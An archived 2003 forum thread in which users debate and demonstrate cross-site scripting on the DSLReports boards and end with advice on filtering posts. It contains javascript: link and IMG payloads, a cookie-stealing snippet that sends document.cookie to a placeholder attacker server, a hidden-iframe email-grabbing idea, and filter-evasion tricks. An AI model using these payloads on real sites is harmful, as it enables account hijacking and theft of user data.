Sarick
It's Only Logical
Premium
join:2003-06-03
USA |  DSLreports Clicking a link in forums?
I've been told that is a security flaw by an admin of a very populer site. CjayC Gamefaqs.com
Anyone? | |
|
 |
|
|
Sarick
It's Only Logical
Premium
join:2003-06-03
USA
 ·FrontierNet Intern..
| No really.
If your in a site then the link you click on if it's inside that site and your ON that site because it's frendly then isn't there a chance that they could call a cookie from your computer. You are clicking on a link that is on DSL reports.
I'm thinking it might be possible, don't get me wrong the cookies work with IP addresses. Check GRC.com and run the cookie test. If you click on a link at this site there might be a way to trick the IE into sending the URL host your cookie info.
This is a security fourm, unless you know the ends and outs don't dog this possible risk I'm looking for people use want to find security risk. | |
|
 | 
Lucif4
Premium
join:2000-12-12
clubs: 
| Re: DSLreports Clicking a link in forums? The program I believe you are talking about is IDServe. Correct?
said by Steve Gibson:
Additional applications for ID Serve:
Simple Cookie Scout: If you are curious about the appearance, format, expiration, and use of a web site's browser cookies, ID Serve can be a convenient way to examine a web site's cookies without either providing or accepting that site's cookies. Simply scroll back through the "Server query processing" window to examine the "Cookie:" header lines sent by the site's web server.
Did you see a cookie header line? Why do you think this is a security risk here at DSLReports?
--
Aim low, shoot high. | |
|
| | 
Randy Bell
Premium
join:2002-02-24
Santa Clara, CA
| Re: DSLreports Clicking a link in forums? said by Lucif4  :
The program I believe you are talking about is IDServe. Correct? .. Did you see a cookie header line? Why do you think this is a security risk here at DSLReports?
I see no cookie header line .. 
--
"But now abide faith, hope, love, these three; but the greatest of these is love." (1 Cor. 13:13) | |
|
|
nil
Java Geek
join:2000-11-27
Host:
Webmasters and Dev..
Forum Feature Requ..
| The password isn't stored in a cookie.. neither is the email address so even if clicking a link could get your cookie it wouldn't do that..
There are more security features.. just having someone's cookie isn't enough.
--
Life is too short to be boring | |
|
| |
| |
nil
Java Geek
join:2000-11-27
Host:
Webmasters and Dev..
Forum Feature Requ..
| Re: DSLreports Clicking a link in forums? That's still just a link.. just mislabled.. and that doesn't steal a cookie!
This has nothing to do with intelligence.. just experience and knowledge of html & internet.
--
Life is too short to be boring | |
|
| | | |
|
Marilla
I Am My Own Arbiter
Premium
join:2002-12-06
Belpre, OH
| There actually IS a way that a password to a forum you are visiting could be stolen by a link in a post on that forum...
Some forums - thankfully, not many - actually include your password in the query string (in the URL, basically). Some of them do this as a way to avoid having to use cookies at all.
The problem is, if every page you visit on a site includes that, if someone puts a link in a post to their site, and you click that link, their website logs will show the 'referer'... that is, the web page that contained the link that you clicked on to arrive at their site. The 'referer' includes the entire URL of the page that had the link... meaning if your username/password are stored in the query string, they will be logged by the site you clicked through to as part of the 'referer'.
That site, however, does not use such a system, and of course, neither does BBR... so there's no trouble there. But if you are ever browsing a site that seems to show username/password up in the address bar, I'd be VERY careful about cross-site links. | |
|
| |
| | 
Smokey
Even drunk on a bet ya make it to Canada
Premium
join:2003-05-20
Va Beach
clubs:
 ·Cox HSI
| Re: DSLreports Clicking a link in forums? what the others were trying to tell you was if you have set up your security correctly, you have little to no risk. If you are so concern about you may want to set up a system that will not allow access to secure information. ultimately it comes down to the user, and there own stupidity. Stupid people do not belong on the internet as they often lead to the many problems that we have. Now I’m no expert, but I know that if I have no business on that site or on the links DON”T CLICK ON THEM
--
If there is any realistic deterrent to marriage, it's the fact that you can't afford divorce. -- Jack Nicholson | |
|
|
hpguru
Curb Your Dogma
Premium
join:2002-04-12 | For many users I think pressing the "On" button on their computers is a security risk. | |
|
| Reverend Ike
Premium
join:2001-08-24
Sacramento, CA
| Re: DSLreports Clicking a link in forums? said by hpguru :
For many users I think pressing the "On" button on their computers is a security risk.
Perhaps you should create a "special" Hpguru Hosts file for them.
4,294,967,295 entries ...  | |
|
| | |
| |
bobince
join:2002-04-19
DE
| OK, here's the deal.
JavaScript (or any other web scripting language, eg. VBSCript) is potentially dangerous. A script on a page can display your cookies, send your cookies to another server, pop up a window containing porn, make you post a message to the forums automatically... and so on.
For most sites this is not an issue because a script could only get onto the page by the site's author putting it there. Naturally DSLReports has no need to steal DSLReports's own cookies, and no inclination to harrass us with pop-ups.
However, DSLReports, by operating this forum, is allowing us to add our own content to their web pages. For this reason the material we are allowed to post in a comment is limited. I can't just include a <script> tag and expect the script I put inside it to execute on everyone's machines, because that sort of thing is filtered out automatically.
The problem is that in practice it is actually rather tricky to filter out all code that could be used to 'inject' scripting content into a page. Most web forum software does not do it right at all.
One way to inject script into a page is by using a javascript: link:
<A HREF="javascript:alert();">innocent-looking-link</A>
If you try pasting that into a DSLR comment, you will get a link that opens a JS alert when you click on it.
<IMG SRC="javascript:alert()">
If you try pasting that into a DSLR comment, you will get a broken image, but the process of loading it will cause most browsers to execute the script, opening the alert again.
Judging by preview mode, the forum software used by DSLR *is* vulnerable to both these attacks. There are a couple of dozen other sneaky techniques for getting scripting content into documents that are supposed to be free of it too.
Of course opening an alert isn't very interesting in itself, but once you're in script like that, you can do anything a script on the site - the typical example is read the user's cookies and send them off to the attacker's server, where they will be used to hack accounts.
DSLR does not actually include the passwords in the cookies, and doesn't allow the password to be changed without the old password being entered, so this wouldn't give an attacker the ability to steal accounts wholesale, but it *would* allow them to post as the victim, change the victim's details, etc. And if the victim is a site administrator everything is up for grabs.
--
Andrew Clover
mailto:and@doxdesk.com
»www.doxdesk.com/ | |
|
|
nil
Java Geek
join:2000-11-27
Host:
Webmasters and Dev..
Forum Feature Requ..
| Re: DSLreports Clicking a link in forums? said by bobince :
DSLR does not actually include the passwords in the cookies, and doesn't allow the password to be changed without the old password being entered, so this wouldn't give an attacker the ability to steal accounts wholesale, but it *would* allow them to post as the victim, change the victim's details, etc. And if the victim is a site administrator everything is up for grabs.
Wrong.. What I posted before is true.. having the cookie is not enough to hijack an account to even make a post..
--
Life is too short to be boring | |
|
| | bobince
join:2002-04-19
DE
| Re: DSLreports Clicking a link in forums? Wrong.. What I posted before is true.. having the cookie is not enough to hijack an account to even make a post.. Well, I am currently posting from a completely different browser, which I authorised by copying document.cookie from the original browser (as if hijacked from JavaScript). So I don't see any security measures that are stopping me from authorising myself as someone else.
And even if this weren't possible, an attacker could stick script an automatic make-a-post or do-an-admin-action attack, through cross-frame scripting.
--
Andrew Clover
mailto:and@doxdesk.com
»www.doxdesk.com/ | |
|
| | |
nil
Java Geek
join:2000-11-27 | Re: DSLreports Clicking a link in forums? and you didn't have to re-enter your password? Plus it was from the same IP..
--
Life is too short to be boring | |
|
| | | | bobince
join:2002-04-19
DE
| Re: DSLreports Clicking a link in forums? and you didn't have to re-enter your password? That is correct.
Plus it was from the same IP.. True, but I'd be surprised if the software requires the IP address to stay constant for one user, as that would completely break the site for eg. AOL users, whose apparent IP address can change on every request.
Even if cookie-stealing didn't give access to accounts (and it's actually very tricky to arrange something like that), just allowing JavaScript through from user-submitted content is enough to compromise the security of the board. It is this that is the real problem.
Filtering JavaScript out completely is not a trivial task, and most forum software is vulnerable to JS injection (cross-site-scripting, XSS) one way or another - search Bugtraq for a large yet incomplete list of known forum vulnerabilities. The software DSLR is using seems to fall to at least one method of JS injection (namely javascript: pseudo-URIs) that is extremely simple and well-known, though.
Or at least I assume so - such exploits make it through the preview; I haven't tried posting them to a live thread. I can try if you like, hope you don't mind the alert() boxes.
(Incidentally, javascript: URIs are one of the worst ever ideas, and have caused endless security holes in web browsers and sites alike, whilst offering zero actual new utility to web authors. Whichever clever-trousers @netscape came up with them desperately needs a kick to the face!)
--
Andrew Clover
mailto:and@doxdesk.com
»www.doxdesk.com/ | |
|
| | | | |
nil
Java Geek
join:2000-11-27 | Re: DSLreports Clicking a link in forums? I do believe it gets stripped out on posting.. it may show up in preview.. but go ahead.. give it a try..
--
Life is too short to be boring | |
|
| | | | | |
Marilla
I Am My Own Arbiter
Premium
join:2002-12-06
Belpre, OH
| Re: DSLreports Clicking a link in forums? Alrighty:
Admin: Feel free to edit this post once the concept is proven.
[text was edited by author 2003-07-21 16:37:19]
[Edit: okay, we need to work on that i guess  - nil ]
[text was edited by moderator] | |
|
| | | |
| |
|
|
Sarick
It's Only Logical
Premium
join:2003-06-03
USA | Re: DSLreports Clicking a link in forums? My dad passed away about 20 years ago. | |
|
Sarick
It's Only Logical
Premium
join:2003-06-03
USA | So In your best judgement DSLreports does have a security valneriblity.
It seems a few people who are on this thread thought that this flaw was urben legends. | |
|
Sarick
It's Only Logical
Premium
join:2003-06-03
USA | Hay, I didn't get to see it.
What happene, It seems you've proven that there is a security risk with the links. Unless you faked that moderater edit. | |
|
|
Marilla
I Am My Own Arbiter
Premium
join:2002-12-06
Belpre, OH
| Re: DSLreports Clicking a link in forums? said by Sarick :
Hay, I didn't get to see it.
What happene, It seems you've proven that there is a security risk with the links. Unless you faked that moderater edit.
Putting script for a Javascript 'Alert' function worked when put in a URL, and when put in the SRC of an IMG tag. When put in the IMG tag, it caused the Alert to come up immediately on loading the page.
However, I'm still not convinced that this amounts to a security problem here, as I do not believe that Javascript would be given access to grab a file from the system (cookies), and then pass that information on to a website.. I dunno. | |
|
lysw1
join:2003-05-19
Jeffersonville, IN | Thank goodness for SurfinGuardPro. What's with all the ActiveX controls at www.doxdesk.com? | |
|
|
Sarick
It's Only Logical
Premium
join:2003-06-03
USA
·FrontierNet Intern..
| Re: DSLreports Clicking a link in forums? said by lysw1 :
Thank goodness for SurfinGuardPro. What's with all the ActiveX controls at www.doxdesk.com?
All this software for security. Seems like active X should be X'ed | |
|
| | |
| | |
Marilla
I Am My Own Arbiter
Premium
join:2002-12-06
Belpre, OH | Re: DSLreports Clicking a link in forums? Did he say "X Box"? | |
|
lysw1
join:2003-05-19
Jeffersonville, IN | Yeah, except that some sites require it. (www.live365.com) | |
|
Sarick
It's Only Logical
Premium
join:2003-06-03
USA
·FrontierNet Intern..
| Scary stuff. Them tool points are hard to get. LOL
Actuialy I think it's a bigger security risk with the cookies now.
DSLreports has a security problem with the cookies. Yea some peoples connections would bust so best solution would be multiple configs. That way people don't have it turned on if it conflicts.
Links however can prove to be nasty. I've tried to set IE to block active X it kills the browser! Then again that might be different not that PCCillin is GONE. I found a glitch in it's active X webblocking TMproxy that has been confermed.
I noticed a file in my desktop the other day that had address book main user identity list in it file named ~
I don't use outlook and adress book so that axtive x must have let something in past spyware guard.
Microshaft Please fix your browser.. | |
|
| 
Jason Levine
Premium
join:2001-07-13
USA
| Re: DSLreports Clicking a link in forums? said by Sarick :
Links however can prove to be nasty. I've tried to set IE to block active X it kills the browser!
I use MyIE2 (an IE "wrapper" program that adds tabbing, pop-up blocking, etc) and I can set it to not load ActiveX, Java, Images, etc. Of course, the better method is the one JayKayKay described of using the Trusted Zone for sizes that need ActiveX and the Internet Zone for sites that don't need it.
--
-Jason Levine
http://www.jasons-toolbox.com/
http://www.PCQandA.com/
http://www.urateit.com/ | |
|
Marilla
I Am My Own Arbiter
Premium
join:2002-12-06
Belpre, OH
| Umm.. something to add here:
I would be very, very careful about putting ANY website in the 'Trusted Zone'... in particular, I would never ever put a website that has forums in the 'trusted sites' zone... even my own forum site, I would never put in the Trusted Sites zone. | |
|
bobince
join:2002-04-19
DE
| That's My Pet X wrote:
I'm still not convinced that this amounts to a security problem here, as I do not believe that Javascript would be given access to grab a file from the system (cookies), and then pass that information on to a website.. I dunno. It's not grabbing a file as such, it's grabbing everything that DLSR itself would have access to, which includes DSLR's own cookies. Once the info is grabbed, sending it to another server is absolutely trivial, you just do any JavaScript operation that results in an HTTP request, and append the cookie to the URL. Often this is done with something like:
im= new Image();
im.src= '»attacking.server/logcookie.cgi?'···.cookie;
but there are many other ways of doing it, which may work better in various circumstances.
lysw1 wrote:
Thank goodness for SurfinGuardPro. What's with all the ActiveX controls at www.doxdesk.com? No ActiveX controls as such, but there is a JavaScript that probes for various ActiveX controls being installed, in order to search for spyware and various other nasties.
--
Andrew Clover
mailto:and@doxdesk.com
»www.doxdesk.com/ | |
|
|
Marilla
I Am My Own Arbiter
Premium
join:2002-12-06
Belpre, OH
| Re: DSLreports Clicking a link in forums? said by bobince :
It's not grabbing a file as such, it's grabbing everything that DLSR itself would have access to, which includes DSLR's own cookies. Once the info is grabbed...
*SNIP*
STOP! right there! Back up... "It's grabbing everything that DLSR itself would have access to..."... That's where you lose me; I know that Javascript can easily direct the browser to ANY webpage at all, anywhere in the world, and include any information in the querystring that it is able to get... that much is not at all in question... I write web pages that use Javascript to do this almost every day..
What's in question is whether, under 'good' security settings, Javascript would get "everything that DLSR itself would have access to" in the first place... how?
Simple question that'll answer this for me: All I ever use Javascript for is form information validation, and navigation... so, does Javascript actually have access to cookie values? By what mechanism?
If so, then I understand exactly what you are saying.
Oh.. and my name is "Marilla", not "That's my Pet X" hehe
[text was edited by author 2003-07-25 01:43:12] | |
|
| | bobince
join:2002-04-19
DE
| Re: DSLreports Clicking a link in forums? Marilla wrote:
What's in question is whether, under 'good' security settings, Javascript would get "everything that DLSR itself would have access to" in the first place... how? Because a script included in a page at example.com is allowed to make a connection to example.com under user credentials, take any action the user can take manually, and read the contents of the returned document.
So for example if I want to find out your real e-mail address, I can include a JavaScript hack in this posting that adds an invisible iframe to the page, sets its location to www.dslreports.com/prof, and accesses (iframe).document.forms[0].elements['email'].value.
Similarly I can script the elements in an iframe to make you post something, add something to your profile, or whatever. The only thing I can't do is grab your password, because the browser doesn't send your password and DSLR never returns it.
Simple question that'll answer this for me: All I ever use Javascript for is form information validation, and navigation... Do you mean as a site user or a site author?
As a site author you don't usually have to worry about your own scripts; as long as they don't accept user input and add it to the page, they're pretty much safe. What you have to worry about, if you have a forum, is ensuring that other people can't sneak their own scripts onto your pages my means of posting hacks.
so, does Javascript actually have access to cookie values? By what mechanism? The 'cookie' property of the 'document' object. eg. try entering javascript:alert(document.cookie) into the address bar.
There are perfectly good reasons for allowing JavaScript to read and set cookies. (For example I use it to implement a hash-based authentication mechanism for when HTTP Digest Authentication isn't available.) The problem is only when a site allows scripts on it that aren't controlled by that site.
--
Andrew Clover
mailto:and@doxdesk.com
http://www.doxdesk.com/ | |
|
| | |
Marilla
I Am My Own Arbiter
Premium
join:2002-12-06
Belpre, OH
| Re: DSLreports Clicking a link in forums? Thank you... you answered my questions! As I noted, I use Javascript a LOT, but usually just to validate forms input - say, to pop up an 'alert' when a required field is missing, so as to avoid a trip to the server, which will only complain about the same thing... and I use it for "Go Back" links, with the history.go(-1) thing, and that's pretty much it...
So I really wasn't aware of what, if any, options there were for accessing stuff like this.... what functions and such Javascript provided which would allow for such information to be gotten... Because a forum like this essentially allows a user to 'write web pages' on the site, I see what you mean, and I very much agree that filters should be added to remove such things (one nice thing about Javascript: It's VERY picky about things like capitalization and such, so functions to replace possibly dangerous JS could 'break' JS functionality without actually harming the appearance of legitimate posts.
And now that you've pointed this out, I'll be adding some more such functions to my OWN public forum system (I programmed my own system that people pay a small fee to customize and use on their sites)... it currently filters out many client-side script things, but this discussion has made me consider a possibility that I'm not sure I covered... so I'll be looking into that to make sure my own users are not exposed to such possible exploits. | |
|
bobince
join:2002-04-19
DE
| functions to replace possibly dangerous JS could 'break' JS functionality without actually harming the appearance of legitimate posts. Ehh. I'm not sure it's worth bothering too much with this. Almost all blocks of this kind are pretty easy to get around.
Say you block the word 'cookie'; I can use document['coo'+'kie'] instead. You block 'document', I use eval('do\x63ument'). And so on. If an attacker has a Turing-compliant programming language at their fingertips, you're onto a loser.
Easier is to try to prevent scripting content getting through at all. Although it's still quite difficult, as it demonstrated by the vulnerability of the vast majority of fora out there including DSLR!
The basics:
* Limit special markup to as few features as possible and make sure they must be matched exactly. If using HTML-style markup, do not allow any attributes to be submitted other than required ones, and require input in a fixed form. Ideally, avoid allowing HTML-style markup in posts at all.
* HTML-encode all text and values included in attributes (eg. URLs in images) on output. There should be no avenue for the poster to get a literal ampersand, quote or left angle bracket into a post.
* If links or images are allowed, disallow any URL method not known-good (http, https, ftp). There are more URL types that can be dangerous than just javascript:.
* Ensure the character set of the final page the untrusted input will appear in is stated, either in the HTML or HTTP headers. If the character set is UTF-8, ensure invalid character sequences cannot be output, for example by storing the posting itself as 16-bit-wide character strings.
(Apologies for the boringness of this post!)
--
Andrew Clover
mailto:and@doxdesk.com
»www.doxdesk.com/ | |
|
|
Sarick
It's Only Logical
Premium
join:2003-06-03
USA | Re: DSLreports Clicking a link in forums? why can't all imag links be locked to image files. (alrady done)
and all web URLs be clear text so if you want to link to them you cut and past. That might help right?
At least until the security risk is fixed. | |
|
| | 
ChrisXP
United We Stand, Divided We Fall
Premium
join:2002-12-13
USA
| Re: DSLreports Clicking a link in forums? This is a very informative thread.
Takes awhile to get through the roadblocks, but once it does get through progress is made.
Good job, Sarick, good job! And I love your quote:
"I know I'm not Stupid, A stupid person doesn't ask questions."
CXP
--
"It's not what you see that's suspect, but how you interpret what you see." ~~~ Isaac Asimov
Remember 9/11: Bodies found "intact": 289
Body parts found: 19,858
Families who received no remains: 1,717 | |
|
| | | |
|
|
|
·
Re: DSLreports Clicking a link in forums?